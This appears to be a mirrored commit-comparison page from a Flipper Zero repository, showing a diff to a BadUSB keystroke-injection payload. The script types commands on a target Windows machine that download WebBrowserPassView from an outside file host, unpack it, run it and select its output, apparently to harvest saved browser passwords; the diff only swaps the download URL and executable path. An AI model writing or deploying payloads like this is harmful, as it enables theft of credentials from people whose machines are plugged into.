mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-04-19 16:57:17 +00:00
Compare commits
2 Commits
7b1466ffbc
...
136ccffdc2
Author | SHA1 | Date | |
---|---|---|---|
|
136ccffdc2 | ||
|
ff9c98f7e2 |
@ -8,9 +8,9 @@ DELAY 1000
|
||||
STRING rmdir -R \temp
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip
|
||||
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://files.catbox.moe/iqlnan.zip -OutFile webpassview.zip ; Expand-Archive webpassview.zip
|
||||
ENTER
|
||||
STRING .\WebBrowserPassView.exe
|
||||
STRING .\webpassview\WebBrowserPassView.exe
|
||||
ENTER
|
||||
DELAY 3000
|
||||
CTRL A
|
Loading…
Reference in New Issue
Block a user